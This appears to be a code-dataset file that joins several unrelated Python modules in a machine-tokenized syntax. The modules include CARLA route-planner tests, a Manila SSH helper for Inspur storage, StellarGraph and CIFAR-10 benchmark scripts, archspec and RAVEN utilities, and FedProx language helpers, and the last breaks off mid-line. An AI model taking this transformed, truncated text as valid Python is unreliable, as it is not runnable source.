<import_stmt>math<import_stmt>unittest<import_stmt>carla<import_from_stmt>global_route_planner GlobalRoutePlanner<import_from_stmt>global_route_planner NavEnum<import_from_stmt>global_route_planner_dao GlobalRoutePlannerDAO<class_stmt>Test_GlobalRoutePlanner(unittest.TestCase)<block_start>""" Test class for GlobalRoutePlanner class """<def_stmt>setUp self# == Utilities test instance without DAO == # <block_start>self.simple_grp=GlobalRoutePlanner(<none>)<line_sep># == Integration test instance == # client=carla.Client('localhost' 2000)<line_sep>world=client.get_world()<line_sep>integ_dao=GlobalRoutePlannerDAO(world.get_map())<line_sep>self.integ_grp=GlobalRoutePlanner(integ_dao)<line_sep>self.integ_grp.setup()<line_sep><pass><block_end><def_stmt>tearDown self<block_start>self.simple_grp=<none><line_sep>self.dao_grp=<none><line_sep>self.integ_grp=<none><line_sep><pass><block_end><def_stmt>test_plan_route self<block_start>""" Test for GlobalROutePlanner.plan_route() Run this test with carla server running Town03 """<line_sep>plan=self.integ_grp.plan_route((-60 -5) (-77.65 72.72))<line_sep>self.assertEqual(plan [NavEnum.START NavEnum.LEFT NavEnum.LEFT NavEnum.GO_STRAIGHT NavEnum.LEFT NavEnum.STOP])<block_end><def_stmt>test_path_search self<block_start>""" Test for GlobalRoutePlanner.path_search() Run this test with carla server running Town03 """<line_sep>self.integ_grp.path_search((191.947 -5.602) (78.730 -50.091))<line_sep>self.assertEqual(self.integ_grp.path_search((196.947 -5.602) (78.730 -50.091)) [256 157 158 117 118 59 55 230])<block_end><def_stmt>test_localise self<block_start>""" Test for GlobalRoutePlanner.localise() Run this test with carla server running Town03 """<line_sep>x,y=(200 -250)<line_sep>segment=self.integ_grp.localise(x y)<line_sep>self.assertEqual(self.integ_grp._id_map[segment['entry']] 5)<line_sep>self.assertEqual(self.integ_grp._id_map[segment['exit']] 225)<block_end><def_stmt>test_unit_vector self<block_start>""" Test for GlobalROutePlanner.unit_vector() """<line_sep>vector=self.simple_grp.unit_vector((1 1) (2 2))<line_sep>self.assertAlmostEquals(vector[0] 1/math.sqrt(2))<line_sep>self.assertAlmostEquals(vector[1] 1/math.sqrt(2))<block_end><def_stmt>test_dot self<block_start>""" Test for GlobalROutePlanner.test_dot() """<line_sep>self.assertAlmostEqual(self.simple_grp.dot((1 0) (0 1)) 0)<line_sep>self.assertAlmostEqual(self.simple_grp.dot((1 0) (1 0)) 1)<block_end><block_end><def_stmt>suite <block_start>""" Gathering all tests """<line_sep>suite=unittest.TestSuite()<line_sep>suite.addTest(Test_GlobalRoutePlanner('test_unit_vector'))<line_sep>suite.addTest(Test_GlobalRoutePlanner('test_dot'))<line_sep>suite.addTest(Test_GlobalRoutePlanner('test_localise'))<line_sep>suite.addTest(Test_GlobalRoutePlanner('test_path_search'))<line_sep>suite.addTest(Test_GlobalRoutePlanner('test_plan_route'))<line_sep><return>suite<block_end><if_stmt>__name__<eq>'__main__'<block_start>""" Running test suite """<line_sep>mySuit=suite()<line_sep>runner=unittest.TextTestRunner()<line_sep>runner.run(mySuit)<block_end>
# Copyright 2019 Inspur Corp. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ CLI helpers for Inspur InStorage """<import_stmt>paramiko<import_stmt>re<import_stmt>six<import_from_stmt>eventlet greenthread<import_from_stmt>oslo_concurrency processutils<import_from_stmt>oslo_log log<import_from_stmt>oslo_utils excutils<import_from_stmt>manila exception<import_from_stmt>manila.i18n _<import_from_stmt>manila utils<as>manila_utils<line_sep>LOG=log.getLogger(__name__)<class_stmt>SSHRunner(object)<block_start>"""SSH runner is used to run ssh command on inspur instorage system."""<def_stmt>__init__ self host port login password privatekey=<none><block_start>self.host=host<line_sep>self.port=port<line_sep>self.login=login<line_sep>self.password=password<line_sep>self.privatekey=privatekey<line_sep>self.ssh_conn_timeout=60<line_sep>self.ssh_min_pool_size=1<line_sep>self.ssh_max_pool_size=10<line_sep>self.sshpool=<none><block_end><def_stmt>__call__ self cmd_list check_exit_code=<true> attempts=1<block_start>"""SSH tool"""<line_sep>manila_utils.check_ssh_injection(cmd_list)<line_sep>command=' '.join(cmd_list)<if_stmt><not>self.sshpool<block_start><try_stmt><block_start>self.sshpool=manila_utils.SSHPool(self.host self.port self.ssh_conn_timeout self.login password=self.password privatekey=self.privatekey min_size=self.ssh_min_pool_size max_size=self.ssh_max_pool_size)<block_end><except_stmt>paramiko.SSHException<block_start>LOG.error("Unable to create SSHPool")<line_sep><raise><block_end><block_end><try_stmt><block_start><return>self._ssh_execute(self.sshpool command check_exit_code attempts)<block_end><except_stmt>Exception<block_start>LOG.error("Error running SSH command: %s" command)<line_sep><raise><block_end><block_end><def_stmt>_ssh_execute self sshpool command check_exit_code=<true> attempts=1<block_start><try_stmt><block_start><with_stmt>sshpool.item()<as>ssh<block_start>last_exception=<none><while_stmt>attempts<g>0<block_start>attempts<augsub>1<try_stmt><block_start><return>processutils.ssh_execute(ssh command check_exit_code=check_exit_code)<block_end><except_stmt>Exception<as>e<block_start>LOG.exception('Error has occurred')<line_sep>last_exception=e<line_sep>greenthread.sleep(1)<block_end><block_end><try_stmt><block_start><raise>processutils.ProcessExecutionError(exit_code=last_exception.exit_code stdout=last_exception.stdout stderr=last_exception.stderr cmd=last_exception.cmd)<block_end><except_stmt>AttributeError<block_start><raise>processutils.ProcessExecutionError(exit_code=-1 stdout="" stderr="Error running SSH command" cmd=command)<block_end><block_end><block_end><except_stmt>Exception<block_start><with_stmt>excutils.save_and_reraise_exception()<block_start>LOG.error("Error running SSH command: %s" command)<block_end><block_end><block_end><block_end><class_stmt>CLIParser(object)<block_start>"""Parse MCS CLI output and generate iterable."""<def_stmt>__init__ self raw ssh_cmd=<none> delim='!' with_header=<true><block_start>super(CLIParser self).__init__()<if_stmt>ssh_cmd<block_start>self.ssh_cmd=' '.join(ssh_cmd)<block_end><else_stmt><block_start>self.ssh_cmd='None'<block_end>self.raw=raw<line_sep>self.delim=delim<line_sep>self.with_header=with_header<line_sep>self.result=self._parse()<block_end><def_stmt>__getitem__ self key<block_start><try_stmt><block_start><return>self.result[key]<block_end><except_stmt>KeyError<block_start>msg=(_('Did not find the expected key %(key)s in %(fun)s: '<concat>'%(raw)s.')%{'key':key 'fun':self.ssh_cmd 'raw':self.raw})<line_sep><raise>exception.ShareBackendException(msg=msg)<block_end><block_end><def_stmt>__iter__ self<block_start><for_stmt>a self.result<block_start><yield>a<block_end><block_end><def_stmt>__len__ self<block_start><return>len(self.result)<block_end><def_stmt>_parse self<block_start><def_stmt>get_reader content delim<block_start><for_stmt>line content.lstrip().splitlines()<block_start>line=line.strip()<if_stmt>line<block_start><yield>line.split(delim)<block_end><else_stmt><block_start><yield>[]<block_end><block_end><block_end><if_stmt>isinstance(self.raw six.string_types)<block_start>stdout,stderr=self.raw ''<block_end><else_stmt><block_start>stdout,stderr=self.raw<block_end>reader=get_reader(stdout self.delim)<line_sep>result=[]<if_stmt>self.with_header<block_start>hds=tuple()<for_stmt>row reader<block_start>hds=row<line_sep><break><block_end><for_stmt>row reader<block_start>cur=dict()<if_stmt>len(hds)<ne>len(row)<block_start>msg=(_('Unexpected CLI response: header/row mismatch. '<concat>'header: %(header)s, row: %(row)s.')%{'header':hds 'row':row})<line_sep><raise>exception.ShareBackendException(msg=msg)<block_end><for_stmt>k,v zip(hds row)<block_start>CLIParser.append_dict(cur k v)<block_end>result.append(cur)<block_end><block_end><else_stmt><block_start>cur=dict()<for_stmt>row reader<block_start><if_stmt>row<block_start>CLIParser.append_dict(cur row[0] ' '.join(row[1:]))<block_end><elif_stmt>cur# start new section <block_start>result.append(cur)<line_sep>cur=dict()<block_end><block_end><if_stmt>cur<block_start>result.append(cur)<block_end><block_end><return>result<block_end>@staticmethod<def_stmt>append_dict dict_ key value<block_start>key,value=key.strip() value.strip()<line_sep>obj=dict_.get(key <none>)<if_stmt>obj<is><none><block_start>dict_[key]=value<block_end><elif_stmt>isinstance(obj list)<block_start>obj.append(value)<line_sep>dict_[key]=obj<block_end><else_stmt><block_start>dict_[key]=[obj value]<block_end><return>dict_<block_end><block_end><class_stmt>InStorageSSH(object)<block_start>"""SSH interface to Inspur InStorage systems."""<def_stmt>__init__ self ssh_runner<block_start>self._ssh=ssh_runner<block_end><def_stmt>_run_ssh self ssh_cmd<block_start><try_stmt><block_start><return>self._ssh(ssh_cmd)<block_end><except_stmt>processutils.ProcessExecutionError<as>e<block_start>msg=(_('CLI Exception output:\n command: %(cmd)s\n '<concat>'stdout: %(out)s\n stderr: %(err)s.')%{'cmd':ssh_cmd 'out':e.stdout 'err':e.stderr})<line_sep>LOG.error(msg)<line_sep><raise>exception.ShareBackendException(msg=msg)<block_end><block_end><def_stmt>run_ssh_inq self ssh_cmd delim='!' with_header=<false><block_start>"""Run an SSH command and return parsed output."""<line_sep>raw=self._run_ssh(ssh_cmd)<line_sep>LOG.debug('Response for cmd %s is %s' ssh_cmd raw)<line_sep><return>CLIParser(raw ssh_cmd=ssh_cmd delim=delim with_header=with_header)<block_end><def_stmt>run_ssh_assert_no_output self ssh_cmd<block_start>"""Run an SSH command and assert no output returned."""<line_sep>out,err=self._run_ssh(ssh_cmd)<if_stmt>len(out.strip())<ne>0<block_start>msg=(_('Expected no output from CLI command %(cmd)s, '<concat>'got %(out)s.')%{'cmd':' '.join(ssh_cmd) 'out':out})<line_sep>LOG.error(msg)<line_sep><raise>exception.ShareBackendException(msg=msg)<block_end><block_end><def_stmt>run_ssh_check_created self ssh_cmd<block_start>"""Run an SSH command and return the ID of the created object."""<line_sep>out,err=self._run_ssh(ssh_cmd)<try_stmt><block_start>match_obj=re.search(r'\[([0-9]+)\],? successfully created' out)<line_sep><return>match_obj.group(1)<block_end><except_stmt>(AttributeError IndexError)<block_start>msg=(_('Failed to parse CLI output:\n command: %(cmd)s\n '<concat>'stdout: %(out)s\n stderr: %(err)s.')%{'cmd':ssh_cmd 'out':out 'err':err})<line_sep>LOG.error(msg)<line_sep><raise>exception.ShareBackendException(msg=msg)<block_end><block_end><def_stmt>lsnode self node_id=<none><block_start>with_header=<true><line_sep>ssh_cmd=['mcsinq' 'lsnode' '-delim' '!']<if_stmt>node_id<block_start>with_header=<false><line_sep>ssh_cmd.append(node_id)<block_end><return>self.run_ssh_inq(ssh_cmd with_header=with_header)<block_end><def_stmt>lsnaspool self pool_id=<none><block_start>ssh_cmd=['mcsinq' 'lsnaspool' '-delim' '!']<if_stmt>pool_id<block_start>ssh_cmd.append(pool_id)<block_end><return>self.run_ssh_inq(ssh_cmd with_header=<true>)<block_end><def_stmt>lsfs self node_name=<none> fsname=<none><block_start><if_stmt>fsname<and><not>node_name<block_start>msg=_('Node name should be set when file system name is set.')<line_sep>LOG.error(msg)<line_sep><raise>exception.InvalidParameterValue(msg)<block_end>ssh_cmd=['mcsinq' 'lsfs' '-delim' '!']<line_sep>to_append=[]<if_stmt>node_name<block_start>to_append<augadd>['-node' '"%s"'%node_name]<block_end><if_stmt>fsname<block_start>to_append<augadd>['-name' '"%s"'%fsname]<block_end><if_stmt><not>to_append<block_start>to_append<augadd>['-all']<block_end>ssh_cmd<augadd>to_append<line_sep><return>self.run_ssh_inq(ssh_cmd with_header=<true>)<block_end><def_stmt>addfs self fsname pool_name size node_name<block_start>"""Create a file system on the storage. :param fsname: file system name :param pool_name: pool in which to create the file system :param size: file system size in GB :param node_name: the primary node name :return: """<line_sep>ssh_cmd=['mcsop' 'addfs' '-name' '"%s"'%fsname '-pool' '"%s"'%pool_name '-size' '%dg'%size '-node' '"%s"'%node_name]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>rmfs self fsname<block_start>"""Remove the specific file system. :param fsname: file system name to be removed :return: """<line_sep>ssh_cmd=['mcsop' 'rmfs' '-name' '"%s"'%fsname]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>expandfs self fsname size<block_start>"""Expand the space of the specific file system. :param fsname: file system name :param size: the size(GB) to be expanded, origin + size = result :return: """<line_sep>ssh_cmd=['mcsop' 'expandfs' '-name' '"%s"'%fsname '-size' '%dg'%size]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end># NAS directory operation <def_stmt>lsnasdir self dirpath<block_start>"""List the child directory under dirpath. :param dirpath: the parent directory to list with :return: """<line_sep>ssh_cmd=['mcsinq' 'lsnasdir' '-delim' '!' '"%s"'%dirpath]<line_sep><return>self.run_ssh_inq(ssh_cmd with_header=<true>)<block_end><def_stmt>addnasdir self dirpath<block_start>"""Create a new NAS directory indicated by dirpath."""<line_sep>ssh_cmd=['mcsop' 'addnasdir' '"%s"'%dirpath]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>chnasdir self old_path new_path<block_start>"""Rename the NAS directory name."""<line_sep>ssh_cmd=['mcsop' 'chnasdir' '-oldpath' '"%s"'%old_path '-newpath' '"%s"'%new_path]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>rmnasdir self dirpath<block_start>"""Remove the specific dirpath."""<line_sep>ssh_cmd=['mcsop' 'rmnasdir' '"%s"'%dirpath]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end># NFS operation <def_stmt>rmnfs self share_path<block_start>"""Remove the NFS indicated by path."""<line_sep>ssh_cmd=['mcsop' 'rmnfs' '"%s"'%share_path]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>lsnfslist self prefix=<none><block_start>"""List NFS shares on a system."""<line_sep>ssh_cmd=['mcsinq' 'lsnfslist' '-delim' '!']<if_stmt>prefix<block_start>ssh_cmd.append('"%s"'%prefix)<block_end><return>self.run_ssh_inq(ssh_cmd with_header=<true>)<block_end><def_stmt>lsnfsinfo self share_path<block_start>"""List a specific NFS share's information."""<line_sep>ssh_cmd=['mcsinq' 'lsnfsinfo' '-delim' '!' '"%s"'%share_path]<line_sep><return>self.run_ssh_inq(ssh_cmd with_header=<true>)<block_end><def_stmt>addnfsclient self share_path client_spec<block_start>"""Add a client access rule to NFS share. :param share_path: the NFS share path. :param client_spec: IP/MASK:RIGHTS:ALL_SQUASH:ROOT_SQUASH. :return: """<line_sep>ssh_cmd=['mcsop' 'addnfsclient' '-path' '"%s"'%share_path '-client' client_spec]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>chnfsclient self share_path client_spec<block_start>"""Change a NFS share's client info."""<line_sep>ssh_cmd=['mcsop' 'chnfsclient' '-path' '"%s"'%share_path '-client' client_spec]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>rmnfsclient self share_path client_spec<block_start>"""Remove a client info from the NFS share."""<line_sep># client_spec parameter for rmnfsclient is IP/MASK, # so we need remove the right part client_spec=client_spec.split(':')[0]<line_sep>ssh_cmd=['mcsop' 'rmnfsclient' '-path' '"%s"'%share_path '-client' client_spec]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end># CIFS operation <def_stmt>lscifslist self filter=<none><block_start>"""List CIFS shares on the system."""<line_sep>ssh_cmd=['mcsinq' 'lscifslist' '-delim' '!']<if_stmt>filter<block_start>ssh_cmd.append('"%s"'%filter)<block_end><return>self.run_ssh_inq(ssh_cmd with_header=<true>)<block_end><def_stmt>lscifsinfo self share_name<block_start>"""List a specific CIFS share's information."""<line_sep>ssh_cmd=['mcsinq' 'lscifsinfo' '-delim' '!' '"%s"'%share_name]<line_sep><return>self.run_ssh_inq(ssh_cmd with_header=<true>)<block_end><def_stmt>addcifs self share_name dirpath oplocks='off'<block_start>"""Create a CIFS share with given path."""<line_sep>ssh_cmd=['mcsop' 'addcifs' '-name' share_name '-path' dirpath '-oplocks' oplocks]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>rmcifs self share_name<block_start>"""Remove a CIFS share."""<line_sep>ssh_cmd=['mcsop' 'rmcifs' share_name]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>chcifs self share_name oplocks='off'<block_start>"""Change a CIFS share's attribute. :param share_name: share's name :param oplocks: 'off' or 'on' :return: """<line_sep>ssh_cmd=['mcsop' 'chcifs' '-name' share_name '-oplocks' oplocks]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>addcifsuser self share_name rights<block_start>"""Add a user access rule to CIFS share. :param share_name: share's name :param rights: [LU|LG]:xxx:[rw|ro] :return: """<line_sep>ssh_cmd=['mcsop' 'addcifsuser' '-name' share_name '-rights' rights]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>chcifsuser self share_name rights<block_start>"""Change a user access rule."""<line_sep>ssh_cmd=['mcsop' 'chcifsuser' '-name' share_name '-rights' rights]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>rmcifsuser self share_name rights<block_start>"""Remove CIFS user from a CIFS share."""<line_sep># the rights parameter for rmcifsuser is LU:NAME rights=':'.join(rights.split(':')[0:-1])<line_sep>ssh_cmd=['mcsop' 'rmcifsuser' '-name' share_name '-rights' rights]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end># NAS port ip <def_stmt>lsnasportip self<block_start>"""List NAS service port ip address."""<line_sep>ssh_cmd=['mcsinq' 'lsnasportip' '-delim' '!']<line_sep><return>self.run_ssh_inq(ssh_cmd with_header=<true>)<block_end><block_end>
# -*- coding: utf-8 -*- # # Copyright 2018-2020 Data61, CSIRO # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>pytest<import_from_stmt>stellargraph.interpretability.saliency_maps IntegratedGradientsGAT<import_stmt>numpy<as>np<import_from_stmt>stellargraph.layer GAT<import_from_stmt>stellargraph.mapper FullBatchNodeGenerator<import_from_stmt>tensorflow.keras Model<import_from_stmt>tensorflow.keras.optimizers Adam<import_from_stmt>tensorflow.keras.losses categorical_crossentropy<import_stmt>networkx<as>nx<import_from_stmt>tensorflow.keras backend<as>K<import_from_stmt>..test_utils.graphs example_graph_1_saliency_maps<as>example_graph_1<def_stmt>create_GAT_model graph<block_start>generator=FullBatchNodeGenerator(graph sparse=<false> method=<none>)<line_sep>train_gen=generator.flow([0 1] np.array([[1 0] [0 1]]))<line_sep>gat=GAT(layer_sizes=[2 2] generator=generator bias=<false> in_dropout=0 attn_dropout=0 activations=["elu" "softmax"] normalize=<none> saliency_map_support=<true> )<for_stmt>layer gat._layers<block_start>layer._initializer="ones"<block_end>x_inp,x_out=gat.in_out_tensors()<line_sep>keras_model=Model(inputs=x_inp outputs=x_out)<line_sep><return>gat keras_model generator train_gen<block_end><def_stmt>get_ego_node_num graph target_idx<block_start>G_ego=nx.ego_graph(graph target_idx radius=2)<line_sep><return>G_ego.number_of_nodes()<block_end><def_stmt>test_ig_saliency_map <block_start>graph=example_graph_1(feature_size=4)<line_sep>base_model,keras_model_gat,generator,train_gen=create_GAT_model(graph)<line_sep>keras_model_gat.compile(optimizer=Adam(lr=0.1) loss=categorical_crossentropy weighted_metrics=["acc"])<line_sep>weights=[np.array([[0.47567585 0.7989239] [0.33588523 0.19814175] [0.15685713 0.43643117] [0.7725941 0.68441933] ]) np.array([[0.71832293] [0.8542117]]) np.array([[0.46560588] [0.8165422]]) np.array(1.0) np.array(0.0) np.array([[0.4391179 0.595691] [0.06000895 0.2613866]]) np.array([[0.43496376] [0.02840129]]) np.array([[0.33972418] [0.22352563]]) np.array(1.0) np.array(0.0) ]<line_sep>keras_model_gat.set_weights(weights)<line_sep># sanity check to make sure that the values of delta and non_exist_edges are not trainable # the expected value should be delta = 1.0 and non_exist_edges = 0.0 <for_stmt>var keras_model_gat.non_trainable_weights<block_start><if_stmt>"ig_delta"<in>var.name<block_start><assert_stmt>K.get_value(var)<eq>1.0<block_end><if_stmt>"ig_non_exist_edge"<in>var.name<block_start><assert_stmt>K.get_value(var)<eq>0.0<block_end><block_end>ig_saliency=IntegratedGradientsGAT(keras_model_gat train_gen generator.node_list)<line_sep>target_id=0<line_sep>class_of_interest=0<line_sep>ig_link_importance=ig_saliency.get_link_importance(target_id class_of_interest steps=200)<line_sep>print(ig_link_importance)<line_sep>ig_link_importance_ref=np.array([[4.759e-11 4.759e-11 4.759e-11 0 0] [-1.442e-10 -1.442e-10 0 0 0] [1.183e-10 0 1.183e-10 1.183e-10 0] [0 0 0 0 0] [0 0 0 0 0] ])<line_sep># Check the number of non-zero elements in the node importance matrix. We expect to see the number be same with the number of nodes in the ego network. <assert_stmt>pytest.approx(np.sum(np.ma.masked_array(ig_link_importance mask=train_gen.A_dense)) 0)<line_sep># TODO: write a better comparison test with larger floating point values # commented out test because of floating point errors # assert ig_link_importance == pytest.approx(ig_link_importance_ref, abs=1e-11) non_zero_edge_importance=np.sum(np.abs(ig_link_importance)<g>1e-11)<assert_stmt>8<eq>non_zero_edge_importance<line_sep>ig_node_importance=ig_saliency.get_node_importance(target_id class_of_interest steps=200)<line_sep>print(ig_node_importance)<assert_stmt>pytest.approx(ig_node_importance np.array([-13.06 -9.32 -7.46 -3.73 0]))<line_sep>non_zero_node_importance=np.sum(np.abs(ig_node_importance)<g>1e-5)<assert_stmt>4<eq>non_zero_node_importance<block_end>
<import_stmt>tensorflow<import_from_stmt>tensorflow.keras.datasets cifar10<import_from_stmt>tensorflow keras<import_stmt>numpy<as>np<line_sep>num_classes=10<class_stmt>EvalDataset(object)<block_start><def_stmt>__init__ self batch_size=100<block_start>(x_train y_train),(x_test y_test)=cifar10.load_data()<line_sep>x_train=x_train.astype('float32')/255<line_sep>x_test=x_test.astype('float32')/255<line_sep># If subtract pixel mean is enabled x_train_mean=np.mean(x_train axis=0)<line_sep>x_train<augsub>x_train_mean<line_sep>x_test<augsub>x_train_mean<line_sep># Convert class vectors to binary class matrices. y_train=tensorflow.keras.utils.to_categorical(y_train num_classes)<line_sep>y_test=tensorflow.keras.utils.to_categorical(y_test num_classes)<line_sep>self.test_images=x_test<line_sep>self.test_labels=y_test<block_end><def_stmt>__len__ self<block_start><return>len(self.test_images)<block_end><def_stmt>__getitem__ self idx<block_start><return>self.test_images[idx] self.test_labels[idx]<block_end><block_end><import_from_stmt>neural_compressor.experimental Benchmark common<line_sep>evaluator=Benchmark('benchmark.yaml')<line_sep>evaluator.model=common.Model('./baseline_model')<line_sep>evaluator.b_dataloader=common.DataLoader(EvalDataset())<line_sep>evaluator('performance')<line_sep>
# Copyright 2019-2020 Lawrence Livermore National Security, LLC and other # Archspec Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) """Global objects with the content of the microarchitecture JSON file and its schema """<import_stmt>json<import_stmt>os.path<try_stmt><block_start><import_from_stmt>collections.abc MutableMapping# novm <block_end><except_stmt>ImportError<block_start><import_from_stmt>collections MutableMapping<block_end><class_stmt>LazyDictionary(MutableMapping)<block_start>"""Lazy dictionary that gets constructed on first access to any object key Args: factory (callable): factory function to construct the dictionary """<def_stmt>__init__ self factory *args **kwargs<block_start>self.factory=factory<line_sep>self.args=args<line_sep>self.kwargs=kwargs<line_sep>self._data=<none><block_end>@property<def_stmt>data self<block_start>"""Returns the lazily constructed dictionary"""<if_stmt>self._data<is><none><block_start>self._data=self.factory(*self.args **self.kwargs)<block_end><return>self._data<block_end><def_stmt>__getitem__ self key<block_start><return>self.data[key]<block_end><def_stmt>__setitem__ self key value<block_start>self.data[key]=value<block_end><def_stmt>__delitem__ self key<block_start><del_stmt>self.data[key]<block_end><def_stmt>__iter__ self<block_start><return>iter(self.data)<block_end><def_stmt>__len__ self<block_start><return>len(self.data)<block_end><block_end><def_stmt>_load_json_file json_file<block_start>json_dir=os.path.join(os.path.dirname(__file__) ".." "json" "cpu")<line_sep>json_dir=os.path.abspath(json_dir)<def_stmt>_factory <block_start>filename=os.path.join(json_dir json_file)<with_stmt>open(filename "r")<as>file<block_start><return>json.load(file)<block_end><block_end><return>_factory<block_end>#: In memory representation of the data in microarchitectures.json, #: loaded on first access TARGETS_JSON=LazyDictionary(_load_json_file("microarchitectures.json"))<line_sep>#: JSON schema for microarchitectures.json, loaded on first access SCHEMA=LazyDictionary(_load_json_file("microarchitectures_schema.json"))<line_sep>
# Copyright 2017 Battelle Energy Alliance, LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>numpy<as>np<line_sep>#static seed np.random.seed(42)<def_stmt>run raven Inputs<block_start>coeffs=[1 1 0]# ax + by + c = 0 -> x = y raven.ans=main(coeffs raven.x raven.y)<block_end>#+ random(scale=raven.stoch)/10 <def_stmt>main coeffs x y thresh=0.01<block_start>distance=dist_to_line(coeffs x y)<line_sep>z=3<times>(x+0.5)<power>2+3<times>(y-0.5)<power>2<line_sep>z<augadd>distance<times>10<line_sep><return>z<block_end><def_stmt>dist_to_line coeffs x0 y0<block_start>cx,cy=closest_point(coeffs x0 y0)<line_sep>dist=np.sqrt((x0-cx)<power>2+(y0-cy)<power>2)<line_sep><return>dist<block_end><def_stmt>closest_point coeffs x0 y0<block_start>a,b,c=coeffs<line_sep>denom=a<times>a+b<times>b<line_sep>x=b<times>(b<times>x0-a<times>y0)-a<times>c<line_sep>x<augdiv>denom<line_sep>y=a<times>(-b<times>x0+a<times>y0)-b<times>c<line_sep>y<augdiv>denom<line_sep><return>x y<block_end><def_stmt>random scale=0.5 loc=-1.0<block_start><return>scale<times>(2.<times>np.random.rand()+loc)<block_end>
# Modified from: https://github.com/litian96/FedProx/blob/master/flearn/utils/language_utils.py # credit goes to: <NAME> (litian96 @ GitHub) """Utils for language models."""<import_stmt>re<import_stmt>numpy<as>np<import_stmt>torch<line_sep># ------------------------ # utils for shakespeare dataset ALL_LETTERS="\n !\"&'(),-.0123456789:;>?ABCDEFGHIJKLMNOPQRSTUVWXYZ[]abcdefghijklmnopqrstuvwxyz}"<line_sep>NUM_LETTERS=len(ALL_LETTERS)<def_stmt>_one_hot index size<block_start>'''returns one-hot vector with given size and value 1 at given index '''<line_sep>vec=[0<for>_ range(size)]<line_sep>vec[int(index)]=1<line_sep><return>vec<block_end><def_stmt>letter_to_vec letter<block_start>'''returns one-hot representation of given letter '''<line_sep>index=ALL_LETTERS.find(letter)<line_sep><return>_one_hot(index NUM_LETTERS)<block_end><def_stmt>word_to_indices word<block_start>'''returns a list of character indices Args: word: string Return: indices: int list with length len(word) '''<line_sep>indices=[]<for_stmt>c word<block_start>indices.append(ALL_LETTERS.find(c))<block_end><return>indices<block_end># ------------------------ # utils for sent140 dataset <def_stmt>split_line line<block_start>'''split given line/phrase into list of words Args: line: string representing phrase to be split Return: list of strings, with each string representing a word '''<line_sep><return>re.findall(r"[\w']+|[.,!?;]" line)<block_end><def_stmt>_word_to_index word indd<block_start>'''returns index of given word based on given lookup dictionary returns the length of the lookup dictionary if word not found Args: word: string indd: dictionary with string words as keys and int indices as values '''<if_stmt>word<in>indd<block_start><return>indd[word]<block_end><else_stmt><block_start><return>len(indd)<block_end><block_end><def_stmt>line_to_indices line word2id max_words=25<block_start>'''converts given phrase into list of word indices if the phrase has more than max_words words, returns a list containing indices of the first max_words words if the phrase has less than max_words words, repeatedly appends integer representing unknown index to returned list until the list's length is max_words Args: line: string representing phrase/sequence of words word2id: dictionary with string words as keys and int indices as values max_words: maximum number of word indices in returned list Return: indl: list of word indices, one index for each word in phrase '''<line_sep>unk_id=len(word2id)<line_sep>line_list=split_line(line)# split phrase in words indl=[word2id[w]<if>w<in>word2id<else>unk_id<for>w line_list[:max_words]]<line_sep>indl<augadd>[unk_id]<times>(max_words-len(indl))<line_sep><return>indl<block_end><def_stmt>bag_of_words line vocab<block_start>'''returns bag of words representation of given phrase using given vocab Args: line: string representing phrase to be parsed vocab: dictionary with words as keys and indices as values Return: integer list '''<line_sep>bag=[0]<times>len(vocab)<line_sep>words=split_line(line)<for_stmt>w words<block_start><if_stmt>w<in>vocab<block_start>bag[vocab[w]]<augadd>1<block_end><block_end><return>bag<block_end><def_stmt>repackage_hidden h<block_start>"""Wraps hidden states in new Tensors, to detach them from their history."""<if_stmt>isinstance(h torch.Tensor)<block_start><return>h.detach()<block_end><else_stmt><block_start><return>tuple(repackage_hidden(v)<for>v h)<block_end><block_end><def_stmt>process_x raw_x_batch<block_start>x_batch=[word_to_indices(word)<for>word raw_x_batch]<line_sep>x_batch=np.array(x_batch).T<line_sep><return>x_batch<block_end><def_stmt>process_y raw_y_batch<block_start>y_batch=[letter_to_vec(c)<for>c raw_y_batch]<line_sep><return>np.array(y_batch)<block_end><def_stmt>patch_h_weights weights L_next assignments# e.g. (1024, 256) comes from (256,256)|(256,256)|(256,256)|(256,256) <block_start><def_stmt>__permutate weight assignments L_next<block_start>new_w_j=np.zeros((L_next L_next) dtype=np.float32)<line_sep>new_w_j[np.ix_(assignments assignments)]=weight# TODO(hwang): make sure if this is correct <return>new_w_j<block_end>split_range=np.split(np.arange(weights.shape[0]) 